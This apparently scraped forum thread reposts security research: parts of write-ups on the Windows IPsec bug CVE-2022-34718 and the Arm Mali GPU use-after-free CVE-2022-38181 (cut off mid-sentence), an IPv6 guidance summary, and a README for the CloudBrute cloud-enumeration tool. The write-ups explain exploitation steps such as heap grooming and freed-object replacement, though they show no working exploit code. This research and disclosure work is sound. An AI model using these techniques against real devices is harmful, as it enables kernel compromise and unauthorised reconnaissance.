A security association consists of a shared state, primarily cryptographic keys and parameters, maintained between two endpoints to secure traffic between them. In simple terms, a security association defines how a host will encrypt/decrypt/authenticate traffic coming from/going to another host. Security associations can be established via the Internet Key Exchange (IKE) or Authenticated IP Protocol. In essence, we need a way to establish a security association with the victim, so that it knows how to decrypt the incoming data from the attacker.

For testing purposes, instead of implementing IKE, I decided to create a security association on the victim manually. This can be done using the Windows Filtering Platform (WFP) WinAPI. Numen's blog post stated that it's not possible to use WFP for secret key management. However, that is incorrect: by modifying sample code provided by Microsoft, it's possible to set a symmetric key that the victim will use to decrypt ESP packets coming from the attacker IP.

Exploitation

Now that the victim knows how to decrypt ESP traffic from us (the attacker), we can build malformed encrypted ESP packets using scapy. Using scapy we can send packets at the IP layer. The exploitation process is simple:

[Image: CVE-2022-34718 PoC]

I create a set of fragmented packets from an ICMPv6 Echo request. Then each fragment is encrypted into an ESP layer before sending.

Primitive

From the root cause analysis diagram pictured above, we know our primitive gives us an out-of-bounds write at:

offset = sizeof(Payload Data) + sizeof(Padding) + sizeof(Padding Length)

The value of the write is controllable via the value of the Next Header field. I set this value on line 36 in my exploit above (0x41).

Denial of Service (DoS)

Corrupting just one byte at a random offset of the NetIoProtocolHeader2 pool (where the target buffer is allocated) usually does not immediately cause a crash. We can reliably crash the target by inserting additional headers within the fragmented message to parse, or by repeatedly pinging the target after corrupting a large portion of the pool.

Limitations to Overcome

For RCE, the offset is attacker-controlled; however, according to the ESP RFC, padding is required such that the Integrity Check Value (ICV) field (if present) is aligned on a 4-byte boundary. Because sizeof(Padding Length) = sizeof(Next Header) = 1, sizeof(Payload Data) + sizeof(Padding) + 2 must be 4-byte aligned, and therefore:

offset = 4n - 1

where n can be any positive integer, constrained by the fact that the payload data and padding must fit within a single packet and are therefore limited by the MTU (frame size). This is problematic because it means full pointers cannot be overwritten. This is limiting, but not necessarily prohibitive; we can still overwrite the offset of an address in an object, a size, a reference counter, etc.
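To make the alignment constraint concrete, here is a tiny illustrative Python snippet. The payload/padding budget is a placeholder (not a value from the original post); it simply enumerates the write offsets reachable under the 4-byte ESP padding rule:

# Offsets reachable for the 1-byte OOB write, given offset = 4n - 1 and an
# illustrative upper bound on sizeof(Payload Data) + sizeof(Padding).
MAX_PAYLOAD_PLUS_PADDING = 1400   # placeholder budget, limited by the MTU

reachable = [4 * n - 1 for n in range(1, MAX_PAYLOAD_PLUS_PADDING // 4 + 1)]
print(reachable[:8])   # [3, 7, 11, 15, 19, 23, 27, 31]
print(reachable[-1])   # largest offset reachable under this budget

Because every reachable offset is of the form 4n - 1, a full 8-byte pointer can never be covered by a single write, which is why the post points at fields like internal offsets, sizes, or reference counters as more realistic corruption targets.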
The possibilities available to us depend on what objects can be sprayed in the kernel pool where the victim headerBuff is allocated.

Heap Grooming Research

[Image: The affected kernel pool in WinDbg]

The victim out-of-bounds buffer is allocated in the NetIoProtocolHeader2 pool. The first steps in heap grooming research are: examine the type of objects allocated in this pool, what is contained in them, how they are used, and how the objects are allocated/freed. This will allow us to examine how the write primitive can be used to obtain a leak or build a stronger primitive. We are not necessarily restricted to NetIoProtocolHeader2. However, because the position of the victim out-of-bounds buffer cannot be predicted, and the address of surrounding pools is randomized, targeting other pools seems challenging.

Demo

Watch the demo exploiting CVE-2022-34718 "EvilESP" for DoS below:

Takeaways

When laid out like this, the bug seems pretty simple. However, it took several long days of reverse engineering and learning about various networking stacks and protocols to understand the full picture and write a DoS exploit. Many researchers will say that configuring the setup and understanding the environment is the most time-consuming and tedious part of the process, and this was no exception. I am very glad that I decided to do this short project; I understand IPv6, IPsec, and fragmentation much better now.

To learn how IBM Security X-Force can help you with offensive security services, schedule a no-cost consult meeting here: IBM X-Force Scheduler. If you are experiencing cybersecurity issues or an incident, contact X-Force to help: U.S. hotline 1-888-241-9812 | Global hotline (+001) 312-212-8034.

References

https://www.rfc-editor.org/rfc/rfc8200#section-4.5
https://blog.quarkslab.com/analysis-of-a-windows-ipv6-fragmentation-vulnerability-cve-2021-24086.html
https://doar-e.github.io/blog/2021/04/15/reverse-engineering-tcpipsys-mechanics-of-a-packet-of-the-death-cve-2021-24086/#diffing-microsoft-patches-in-2021
https://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml
https://datatracker.ietf.org/doc/html/rfc4303
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34718

Sursa: https://securityintelligence.com/posts/dissecting-exploiting-tcp-ip-rce-vulnerability-evilesp/
  12. Executive summary Nearly all networked devices use the Internet Protocol (IP) for their communications. IP version 6 (IPv6) is the current version of IP and provides advantages over the legacy IP version 4 (IPv4). Most notably, the IPv4 address space is inadequate to support the increasing number of networked devices requiring routable IP addresses, whereas IPv6 provides a vast address space to meet current and future needs. While some technologies, such as network infrastructure, are more affected by IPv6 than others, nearly all networked hardware and software are affected in some way as well. As a result, IPv6 has broad impact on cybersecurity that organizations should address with due diligence. IPv6 security issues are quite similar to those from IPv4. That is, the security methods used with IPv4 should typically be applied to IPv6 with adaptations as required to address the differences with IPv6. Security issues associated with an IPv6 implementation will generally surface in networks that are new to IPv6, or in early phases of the IPv6 transition. These networks lack maturity in IPv6 configurations and network security tools. More importantly, they lack overall experience by the administrators in the IPv6 protocol. Dual stacked networks (that run both IPv4 and IPv6 simultaneously) have additional security concerns, so further countermeasures are needed to mitigate these risks due to the increased attack surface of having both IPv4 and IPv6. Download: https://media.defense.gov/2023/Jan/18/2003145994/-1/-1/0/CSI_IPV6_SECURITY_GUIDANCE.PDF
  13. CloudBrute

A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike. The complete writeup is available here.

Motivation

While working on HunterSuite, and as part of the job, we are always thinking of something we can automate to make black-box security testing easier. We discussed the idea of creating a multi-platform cloud brute-force hunter, mainly to find open buckets, apps, and databases hosted on the clouds, and possibly apps behind proxy servers. Here is the list of issues we tried to fix:

separated wordlists
lack of proper concurrency
lack of support for all major cloud providers
requiring authentication, keys, or cloud CLI access
outdated endpoints and regions
incorrect file storage detection
lack of support for proxies (useful for bypassing region restrictions)
lack of support for user agent randomization (useful for bypassing rare restrictions)
hard to use, poorly configured

Features

Cloud detection (IPINFO API and source code)
Supports all major providers
Black-box (unauthenticated)
Fast (concurrent)
Modular and easily customizable
Cross-platform (Windows, Linux, macOS)
User-Agent randomization
Proxy randomization (HTTP, SOCKS5)

Supported Cloud Providers

Microsoft: Storage, Apps
Amazon: Storage, Apps
Google: Storage, Apps
DigitalOcean: Storage
Vultr: Storage
Linode: Storage
Alibaba: Storage

Version: 1.0.0

Usage

Just download the latest release for your operating system and follow the usage. To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder containing a config.yaml file. It looks like this:

providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers
environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
proxytype: "http" # socks5 / http
ipinfo: "" # IPINFO.io API KEY

For the IPINFO API, you can register and get a free key at IPINFO. The environments are used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc. We provide some wordlists out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool. After setting up your API key, you are ready to use CloudBrute.

[CloudBrute ASCII art banner] V 1.0.7

usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
                  -w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads <integer>]
                  [-T|--timeout <integer>] [-p|--proxy "<value>"] [-a|--randomagent "<value>"]
                  [-D|--debug] [-q|--quite] [-m|--mode "<value>"] [-o|--output "<value>"]
                  [-C|--configFolder "<value>"]

Awesome Cloud Enumerator

Arguments:

  -h  --help          Print help information
  -d  --domain        domain
  -k  --keyword       keyword used to generate urls
  -w  --wordlist      path to wordlist
  -c  --cloud         force a search, check config.yaml providers list
  -t  --threads       number of threads. Default: 80
  -T  --timeout       timeout per request in seconds. Default: 10
  -p  --proxy         use proxy list
  -a  --randomagent   user agent randomization
  -D  --debug         show debug logs. Default: false
  -q  --quite         suppress all output. Default: false
  -m  --mode          storage or app. Default: storage
  -o  --output        Output file. Default: out.txt
  -C  --configFolder  Config path. Default: config

For example:

CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

Please note: the -k keyword is used to generate URLs, so if you want the full domain to be part of the mutation, you have to use it for both the domain (-d) and keyword (-k) arguments.

If a cloud provider is not detected, or you want to force searching on a specific provider, you can use the -c option:

CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

Dev

Clone the repo
go build -o CloudBrute main.go
go test internal

In action

How to contribute

Add a module or fix something, then open a pull request. Share it with whomever you believe can use it. Do the extra work and share your findings with the community ♥

FAQ

How to make the best out of this tool? Read the usage.
I get errors; what should I do? Make sure you read the usage correctly, and if you think you found a bug, open an issue.
When I use proxies, I get too many errors, or it's too slow? That's because you are using public proxies; use private, higher quality proxies. You can use ProxyFor to verify the good proxies with your chosen provider.
Too fast or too slow? Change the -T (timeout) option to get the best results for your run.

Credits

Inspired by every single repo listed here.

Sursa: https://github.com/0xsha/CloudBrute
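To illustrate the keyword/environment mutation scheme that the config and the -k flag describe, here is a small Python sketch. It is an assumption-based illustration (the separators and patterns are inferred from the README examples such as test-keyword.target.region), not CloudBrute's actual Go implementation.

# Illustrative sketch of keyword/environment mutation, not CloudBrute's real Go code.
from itertools import product

keyword = "target"                               # value passed with -k
environments = ["test", "dev", "prod", "stage"]  # from config.yaml
words = ["backup", "files", "assets"]            # wordlist entries
endpoints = ["s3.amazonaws.com"]                 # provider endpoint (placeholder)

candidates = set()
for env, word, endpoint in product(environments, words, endpoints):
    # Join parts with the separators seen in the README examples.
    for sep in ("-", "."):
        candidates.add(f"{env}{sep}{keyword}{sep}{word}.{endpoint}")
        candidates.add(f"{keyword}{sep}{word}.{endpoint}")

for url in sorted(candidates):
    print(url)

Each candidate would then be requested against the provider's storage or app endpoint to check whether it exists and is publicly accessible.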
  14. Pwning the all Google phone with a non-Google bug It turns out that the first “all Google” phone includes a non-Google bug. Learn about the details of CVE-2022-38181, a vulnerability in the Arm Mali GPU. Join me on my journey through reporting the vulnerability to the Android security team, and the exploit that used this vulnerability to gain arbitrary kernel code execution and root on a Pixel 6 from an Android app. Author Man Yue Mo January 23, 2023 The “not-Google” bug in the “all-Google” phone The year is 2021 A.D. The first “all Google” phone, the Pixel 6 series, made entirely by Google, is launched. Well not entirely… One small GPU chip still holds out. And life is not easy for security researchers who audit the fortified camps of Midgard, Bifrost, and Valhall.1 An unfortunate security researcher was about to learn this the hard way as he wandered into the Arm Mali regime: CVE-2022-38181 In this post I’ll cover the details of CVE-2022-38181, a vulnerability in the Arm Mali GPU that I reported to the Android security team on 2022-07-12 along with a proof-of-concept exploit that used this vulnerability to gain arbitrary kernel code execution and root privileges on a Pixel 6 from an Android app. The bug was assigned bug ID 238770628. After initially rating it as a High-severity vulnerability, the Android security team later decided to reclassify it as a “Won’t fix” and they passed my report to Arm’s security team. I was eventually able to get in touch with Arm’s security team to independently follow up on the issue. The Arm security team were very helpful throughout and released a public patch in version r40p0 of the driver on 2022-10-07 to address the issue, which was considerably quicker than similar disclosures that I had in the past on Android. A coordinated disclosure date of around mid-November was also agreed to allow time for users to apply the patch. However, I was unable to connect with the Android security team and the bug was quietly fixed in the January update on the Pixel devices as bug 259695958. Neither the CVE ID, nor the bug ID (the original 238770628 and the new 259695958) were mentioned in the security bulletin. Our advisory, including the disclosure timeline, can be found here. The Arm Mali GPU The Arm Mali GPU is a “device-specific” hardware component which can be integrated into various devices, ranging from Android phones to smart TV boxes. For example, all of the international versions of the Samsung S series phones, up to S21 use the Mali GPU, as well as the Pixel 6 series. For additional examples, see “implementations” in Mali(GPU) Wikipedia entry for some specific devices that use the Mali GPU. As explained in my other post, GPU drivers on Android are a very attractive target for an attacker, as they can be reached directly from the untrusted app domain and most Android devices use either Qualcomm’s Adreno GPU, or the Arm Mali GPU, meaning that relatively few bugs can cover a large number of devices. In fact, of the seven Android 0-days that were detected as exploited in the wild in 2021– five targeted GPU drivers. Another more recent bug that was exploited in the wild – CVE-2021-39793, disclosed in March 2022 – also targeted a GPU driver. Together, of these six bugs that were exploited in the wild that targeted Android GPU drivers, three bugs targeted the Qualcomm GPU, while the other three targeted the Arm Mali GPU. 
Due to the complexity involved in managing memory sharing between user space applications and the GPU, many of the vulnerabilities in the Arm Mali GPU involve the memory management code. The current vulnerability is another example of this, and involves a special type of GPU memory: the JIT memory. Contrary to the name, JIT memory does not seem to be related to JIT compiled code, as it is created as non-executable memory. Instead, it seems to be used for memory caches, managed by the GPU kernel driver, that can readily be shared with user applications and returned to the kernel when memory pressure arises. Many other types of GPU memory are created directly using ioctl calls like KBASE_IOCTL_MEM_IMPORT. (See, for example, the section “Memory management in the Mali kernel driver” in my previous post.) This, however, is not the case for JIT memory regions, which are created by submitting a special GPU instruction using the KBASE_IOCTL_JOB_SUBMIT ioctl call. The KBASE_IOCTL_JOB_SUBMIT ioctl can be used to submit a “job chain” to the GPU for processing. Each job chain is basically a list of jobs, which are opaque data structures that contain job headers, followed by payloads that contain the specific instructions. For an example, see the Writing to GPU memory section in my previous post. While the KBASE_IOCTL_JOB_SUBMIT is normally used for sending instructions to the GPU itself, there are also some jobs that are implemented in the kernel and run on the host (CPU) instead. These are the software jobs (“softjobs”) and among them are jobs that instruct the kernel to allocate and free JIT memory (BASE_JD_REQ_SOFT_JIT_ALLOC and BASE_JD_REQ_SOFT_JIT_FREE). The life cycle of JIT memory While KBASE_IOCTL_JOB_SUBMIT is a general purpose ioctl call and contains code paths that are responsible for handling different types of GPU jobs, the BASE_JD_REQ_SOFT_JIT_ALLOC job essentially calls kbase_jit_allocate_process, which then calls kbase_jit_allocate to create a JIT memory region. To understand the lifetime and usage of JIT memory, let me first introduce a few different concepts. When using the Mali GPU driver, a user app first needs to create and initialize a kbase_context kernel object. This involves the user app opening the driver file and using the resulting file descriptor to make a series of ioctl calls. A kbase_context object is responsible for managing resources for each driver file that is opened and is unique for each file handle. In particular, it has three list_head fields that are responsible for managing JIT memory: the jit_active_head, the jit_pool_head, and the jit_destroy_head. As their names suggest, jit_active_head contains memory that is still in use by the user application, jit_pool_head contains memory regions that are not in use, and jit_destroy_head contains memory regions that are pending to be freed and returned to the kernel. Although both jit_pool_head and jit_destroy_head are used to manage JIT regions that are free, jit_pool_head acts like a memory pool and contains JIT regions that are intended to be reused when new JIT regions are allocated, while jit_destroy_head contains regions that are going to be returned to the kernel. When kbase_jit_allocate is called, it’ll first try to find a suitable region in the jit_pool_head: if (info->usage_id != 0) /* First scan for an allocation with the same usage ID */ reg = find_reasonable_region(info, &kctx->jit_pool_head, false); ... if (reg) { ... 
list_move(&reg->jit_node, &kctx->jit_active_head); If a suitable region is found, then it’ll be moved to jit_active_head, indicating that it is now in use in userland. Otherwise, a memory region will be created and added to the jit_active_head instead. The region allocated by kbase_jit_allocate, whether it is newly created or reused from jit_pool_head, is then stored in the jit_alloc array of the kbase_context by kbase_jit_allocate_process. When the user no longer needs the JIT memory, it can send a BASE_JD_REQ_SOFT_JIT_FREE job to the GPU. This then uses kbase_jit_free to free the memory. However, rather than returning the backing pages of the memory region back to the kernel immediately, kbase_jit_free first reduces the backing region to a minimal size and removes any CPU side mapping, so the pages in the region are no longer reachable from the address space of the user process: void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg) { ... //First reduce the size of the backing region and unmap the freed pages old_pages = kbase_reg_current_backed_size(reg); if (reg->initial_commit < old_pages) { u64 new_size = MAX(reg->initial_commit, div_u64(old_pages * (100 - kctx->trim_level), 100)); u64 delta = old_pages - new_size; //Free delta pages in the region and reduces its size to old_pages - delta if (delta) { mutex_lock(&kctx->reg_lock); kbase_mem_shrink(kctx, reg, old_pages - delta); mutex_unlock(&kctx->reg_lock); } } ... //Remove the pages from address space of user process kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents); Note that the backing pages of the region (reg) are not completely removed at this stage, and reg is also not going to be freed here. Instead, reg is moved back into jit_pool_head. However, perhaps more interestingly, reg is also moved to the evict_list of the kbase_context: kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents); ... mutex_lock(&kctx->jit_evict_lock); /* This allocation can't already be on a list. */ WARN_ON(!list_empty(&reg->gpu_alloc->evict_node)); //Add reg to evict_list list_add(&reg->gpu_alloc->evict_node, &kctx->evict_list); atomic_add(reg->gpu_alloc->nents, &kctx->evict_nents); //Move reg to jit_pool_head list_move(&reg->jit_node, &kctx->jit_pool_head); After kbase_jit_free completed, its caller, kbase_jit_free_finish, will also clean up the reference stored in jit_alloc when the region was allocated, even though reg is still valid at this stage: static void kbase_jit_free_finish(struct kbase_jd_atom *katom) { ... for (j = 0; j != katom->nr_extres; ++j) { if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) { ... if (kctx->jit_alloc[ids[j]] != KBASE_RESERVED_REG_JIT_ALLOC) { ... kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]); } kctx->jit_alloc[ids[j]] = NULL; //<--------- clean up reference } } ... } As we’ve seen before, the memory region in the jit_pool_head list may now be reused when the user allocates another JIT region. So this explains jit_pool_head and jit_active_head. What about jit_destroy_head? When JIT memory is freed by calling kbase_jit_free, it is also put on the evict_list. Memory regions in the evict_list are regions that can be freed when memory pressure arises. By putting a JIT region that is no longer in use in the evict_list, the Mali driver can hold onto unused JIT memory for quick reallocation, while returning them to the kernel when the resources are needed. The Linux kernel provides a mechanism to reclaim unused cached memory, called shrinkers. 
Kernel components, such as drivers, can define a shrinker object, which, amongst other things, involves defining the count_objects and scan_objects methods: struct shrinker { unsigned long (*count_objects)(struct shrinker *, struct shrink_control *sc); unsigned long (*scan_objects)(struct shrinker *, struct shrink_control *sc); ... }; The custom shrinker can then be registered via the register_shrinker method. When the kernel is under memory pressure, it’ll go through the list of registered shrinkers and use their count_objects method to determine potential amount of memory that can be freed, and then use scan_objects to free the memory. In the case of the Mali GPU driver, the shrinker is defined and registered in the kbase_mem_evictable_init method: int kbase_mem_evictable_init(struct kbase_context *kctx) { ... //kctx->reclaim is a shrinker kctx->reclaim.count_objects = kbase_mem_evictable_reclaim_count_objects; kctx->reclaim.scan_objects = kbase_mem_evictable_reclaim_scan_objects; ... register_shrinker(&kctx->reclaim); return 0; } The more interesting part of these methods is the kbase_mem_evictable_reclaim_scan_objects, which is responsible for freeing the memory needed by the kernel. static unsigned long kbase_mem_evictable_reclaim_scan_objects(struct shrinker *s, struct shrink_control *sc) { ... list_for_each_entry_safe(alloc, tmp, &kctx->evict_list, evict_node) { int err; err = kbase_mem_shrink_gpu_mapping(kctx, alloc->reg, 0, alloc->nents); ... kbase_free_phy_pages_helper(alloc, alloc->evicted); ... list_del_init(&alloc->evict_node); ... kbase_jit_backing_lost(alloc->reg); //<------- moves `reg` to `jit_destroy_pool` } ... } This is called to remove cached memory in jit_pool_head and return it to the kernel. The function kbase_mem_evictable_reclaim_scan_objects goes through the evict_list, unmaps the backing pages from the GPU (recall that the CPU mapping is already removed in kbase_jit_free) and then frees the backing pages. It then calls kbase_jit_backing_lost to move reg from jit_pool_head to jit_destroy_head: void kbase_jit_backing_lost(struct kbase_va_region *reg) { ... list_move(&reg->jit_node, &kctx->jit_destroy_head); schedule_work(&kctx->jit_work); } The memory region in jit_destroy_head is then picked up by the kbase_jit_destroy_worker, which then frees the kbase_va_region in jit_destroy_head and removes references to the kbase_va_region entirely. Well not entirely…one small pointer still holds out against the clean up logic. And lifetime management is not easy for the pointers in the fortified camps of the Arm Mali regime. The clean up logic in kbase_mem_evictable_reclaim_scan_objects is not responsible for removing the reference in jit_alloc from when the JIT memory is allocated, but this is not a problem, because as we’ve seen before, this reference was cleared when kbase_jit_free_finish was called to put the region in the evict_list and, normally, a JIT region is only moved to the evict_list when the user frees it via a BASE_JD_REQ_SOFT_JIT_FREE job, which removes the reference stored in jit_alloc. But we don’t do normal things here, nor do the people who seek to compromise devices. The vulnerability While the semantics of memory eviction is closely tied to JIT memory with most eviction functionality referencing “JIT” (for example, the use of kbase_jit_backing_lost in kbase_mem_evictable_reclaim_objects), evictable memory is more general and other types of GPU memory can also be added to the evict_list and be made evictable. 
This can be achieved by calling kbase_mem_evictable_make to add memory regions to the evict_list and kbase_mem_evictable_unmake to remove memory regions from it. From userspace, these can be called via the KBASE_IOCTL_MEM_FLAGS_CHANGE ioctl. Depending on whether the KBASE_REG_DONT_NEED flag is passed, a memory region can be added or removed from the evict_list: int kbase_mem_flags_change(struct kbase_context *kctx, u64 gpu_addr, unsigned int flags, unsigned int mask) { ... prev_needed = (KBASE_REG_DONT_NEED & reg->flags) == KBASE_REG_DONT_NEED; new_needed = (BASE_MEM_DONT_NEED & flags) == BASE_MEM_DONT_NEED; if (prev_needed != new_needed) { ... if (new_needed) { ... ret = kbase_mem_evictable_make(reg->gpu_alloc); //<------ Add to `evict_list` if (ret) goto out_unlock; } else { kbase_mem_evictable_unmake(reg->gpu_alloc); //<------- Remove from `evict_list` } } By putting a JIT memory region directly in the evict_list and then creating memory pressure to trigger kbase_mem_evictable_reclaim_scan_objects, the JIT region will be freed with a pointer to it still stored in jit_alloc. After that, a BASE_JD_REQ_SOFT_JIT_FREE job can be submitted to trigger kbase_jit_free_finish to use the freed object pointed to in jit_alloc: static void kbase_jit_free_finish(struct kbase_jd_atom *katom) { ... for (j = 0; j != katom->nr_extres; ++j) { if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) { ... if (kctx->jit_alloc[ids[j]] != KBASE_RESERVED_REG_JIT_ALLOC) { ... kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]); //<----- Use of the now freed jit_alloc[ids[j]] } kctx->jit_alloc[ids[j]] = NULL; } } Amongst other things, kbase_jit_free will first free some of the backing pages in the now freed kctx->jit_alloc[ids[j]]: void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg) { ... old_pages = kbase_reg_current_backed_size(reg); if (reg->initial_commit < old_pages) { ... u64 delta = old_pages - new_size; if (delta) { mutex_lock(&kctx->reg_lock); kbase_mem_shrink(kctx, reg, old_pages - delta); //<----- Free some pages in the region mutex_unlock(&kctx->reg_lock); } } So by replacing the freed JIT region with a fake object, I can potentially free arbitrary pages, which is a very powerful primitive. Exploiting the bug As explained before, this bug is triggered when the kernel is under memory pressure and calls kbase_mem_evictable_reclaim_scan_objects via the shrinker mechanism. From a user process, the required memory pressure can be created as simply as mapping a large amount of memory using the mmap system call. However, the exact amount of memory required to trigger the shrinker scanning is uncertain, meaning that there is no guarantee that a shrinker scan will be triggered after such an allocation. While I can try to allocate an excessive amount of memory to ensure that the shrinker scanning is triggered, doing so risks causing an out-of-memory crash and may also cause the object replacement to be unreliable. This causes problems in triggering and exploiting the bug reliably. It would be good if I could allocate memory incrementally and check whether the JIT region is freed by kbase_mem_evictable_reclaim_scan_objects after each allocation step and only proceed with the exploit when I’m sure that the bug has been triggered. The Mali driver provides an ioctl, KBASE_IOCTL_MEM_QUERY for querying properties of memory regions at a specific GPU address. If the address is invalid, the ioctl will fail and return an error. 
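As a rough sketch of the probe-and-pressure strategy described here and in the following paragraphs, the Python-style simulation below uses hypothetical stand-in helpers (allocate_jit_region, make_evictable, mem_query_succeeds, apply_memory_pressure, spray_mem_alloc_regions) in place of the real BASE_JD_REQ_SOFT_JIT_ALLOC job, the KBASE_IOCTL_MEM_FLAGS_CHANGE and KBASE_IOCTL_MEM_QUERY ioctls, the mmap-based memory pressure, and the KBASE_IOCTL_MEM_ALLOC spray. It is only an outline of the strategy, not the author's exploit code.

# Simulation-style sketch; every helper is a hypothetical stand-in for the
# driver interaction described in the text, not a real ioctl wrapper.

STEP = 64 * 1024 * 1024   # grow memory pressure in 64 MiB increments (illustrative)
_probe_rounds = 0

def allocate_jit_region():
    """Stand-in for submitting a BASE_JD_REQ_SOFT_JIT_ALLOC softjob."""
    return 0x7000000000    # pretend GPU address of the JIT region

def make_evictable(gpu_addr):
    """Stand-in for KBASE_IOCTL_MEM_FLAGS_CHANGE with BASE_MEM_DONT_NEED."""

def mem_query_succeeds(gpu_addr):
    """Stand-in for KBASE_IOCTL_MEM_QUERY: starts failing once the shrinker
    has torn down the region's GPU mapping."""
    global _probe_rounds
    _probe_rounds += 1
    return _probe_rounds < 5   # pretend the shrinker fires after some pressure

def apply_memory_pressure(nbytes):
    """Stand-in for mmap()ing and faulting in more anonymous memory."""

def spray_mem_alloc_regions(count):
    """Stand-in for KBASE_IOCTL_MEM_ALLOC allocations meant to reclaim the
    freed kbase_va_region slot."""

jit = allocate_jit_region()
make_evictable(jit)

# Keep adding pressure until the query fails, i.e. the JIT region was reclaimed
# while kctx->jit_alloc still holds a dangling pointer to it.
while mem_query_succeeds(jit):
    apply_memory_pressure(STEP)

# Immediately spray same-sized regions on the same CPU to take over the slot.
spray_mem_alloc_regions(count=64)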
This allows me to check whether the JIT region is freed, because when kbase_mem_evictable_reclaim_scan_objects is called to free the JIT region, it’ll first remove its GPU mappings, making its GPU address invalid. By using the KBASE_IOCTL_MEM_QUERY ioctl to query the GPU address of the JIT region after each allocation, I can therefore check whether the region has been freed by kbase_mem_evictable_reclaim_scan_objects or not, and only start spraying the heap to replace the JIT region when it is actually freed. Moreover, the KBASE_IOCTL_MEM_QUERY ioctl doesn’t involve memory allocation, so it won’t interfere with the object replacement. This makes it perfect for testing whether the bug has been triggered. Although shrinker is a kernel mechanism for freeing up evictable memory, the scanning and removal of evictable objects via shrinkers is actually performed by the process that is requesting the memory. So for example, if my process is mapping some memory to its address space (via mmap and then faulting the pages), and the amount of memory that I am mapping creates sufficient memory pressure that a shrinker scan is triggered, then the shrinker scan and the removal of the evictable objects will be done in the context of my process. This, in particular, means that if I pin my process to a CPU while the shrinker scan is triggered, the JIT region that is removed during the scan will be freed on the same CPU. (Strictly speaking, this is not a hundred percent correct, because the JIT region is actually scheduled to be freed on a worker, but most of the time, the worker is indeed executed immediately on the same CPU.) This helps me to replace the freed JIT region reliably, because when objects are freed in the kernel, they are placed within a per CPU cache, and subsequent object allocations on the same CPU will first be allocated from the CPU cache. This means that, by allocating another object of similar size on the same CPU, I’m likely to be able to replace the freed JIT region. Moreover, the JIT region, which is a kbase_va_region, is actually a rather large object that is allocated in the kmalloc-256 cache, (which is used to allocate objects of size between 256-512 bytes when kmalloc is called) instead of the kmalloc-128 cache, (which allocates objects of size less than 128 bytes), and the kmalloc-256 cache is a less used cache. This, together with the relative certainty of the CPU that frees the JIT region, allows me to reliably replace the JIT region after it is freed. Replacing the freed object Now that I can reliably replace the freed JIT region, I can look at how to exploit the bug. As explained before, the freed JIT memory can be used as the reg argument in the kbase_jit_free function to potentially be used for freeing arbitrary pages: void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg) { ... old_pages = kbase_reg_current_backed_size(reg); if (reg->initial_commit < old_pages) { ... u64 delta = old_pages - new_size; if (delta) { mutex_lock(&kctx->reg_lock); kbase_mem_shrink(kctx, reg, old_pages - delta); //<----- Free some pages in the region mutex_unlock(&kctx->reg_lock); } } One possibility is to use the well-known heap spraying technique to replace the freed JIT region with arbitrary data using sendmsg. This would enable me to create a fake kbase_va_region with a fake gpu_alloc and fake pages that could be used to free arbitrary pages in kbase_mem_shrink: int kbase_mem_shrink(struct kbase_context *const kctx, struct kbase_va_region *const reg, u64 new_pages) { ... 
err = kbase_mem_shrink_gpu_mapping(kctx, reg, new_pages, old_pages); if (err >= 0) { /* Update all CPU mapping(s) */ kbase_mem_shrink_cpu_mapping(kctx, reg, new_pages, old_pages); kbase_free_phy_pages_helper(reg->cpu_alloc, delta); //<------- free pages in cpu_alloc if (reg->cpu_alloc != reg->gpu_alloc) kbase_free_phy_pages_helper(reg->gpu_alloc, delta); //<--- free pages in gpu_alloc In order to do so, I’d need to know the addresses of some data that I can control, so I could create a fake gpu_alloc and its pages field at those addresses. This could be done either by finding a way to leak addresses of kernel objects, or use techniques like the one I wrote about in the Section “The Ultimate fake object store” in my other post. But why use a fake object when you can use a real one? The JIT region that is involved in the use-after-free bug here is a kbase_va_region, which is a complex object that has multiple states. Many operations can only be performed on memory objects with a correct state. In particular, kbase_mem_shrink can only be used on a kbase_va_region that has not been mapped multiple times. The Mali driver provides the KBASE_IOCTL_MEM_ALIAS ioctl that allows multiple memory regions to share the same backing pages. I’ve written about how KBASE_IOCTL_MEM_ALIAS works in more details in my previous post, but for the purpose of this exploit, the crucial point is that KBASE_IOCTL_MEM_ALIAS can be used to create memory regions in the GPU and user address spaces that are aliased to a kbase_va_region, meaning that they are backed by the same physical pages. If a kbase_va_region reg is mapped multiple times by using KBASE_IOCTL_MEM_ALIAS and then has its backing pages freed by kbase_mem_shrink, then only the memory mappings in reg are removed, so the alias regions created by KBASE_IOCTL_MEM_ALIAS can still be used to access the freed backing pages. To prevent kbase_mem_shrink from being called on aliased JIT memory, kbase_mem_alias checks for the KBASE_REG_NO_USER_FREE, so that JIT memory cannot be aliased: u64 kbase_mem_alias(struct kbase_context *kctx, u64 *flags, u64 stride, u64 nents, struct base_mem_aliasing_info *ai, u64 *num_pages) { ... for (i = 0; i < nents; i++) { if (ai[i].handle.basep.handle < BASE_MEM_FIRST_FREE_ADDRESS) { if (ai[i].handle.basep.handle != BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE) ... } else { ... if (aliasing_reg->flags & KBASE_REG_NO_USER_FREE) //<-- 2. goto bad_handle; /* JIT regions can't be * aliased. NO_USER_FREE flag * covers the entire lifetime * of JIT regions. The other * types of regions covered * by this flag also shall * not be aliased. ... } Now suppose I trigger 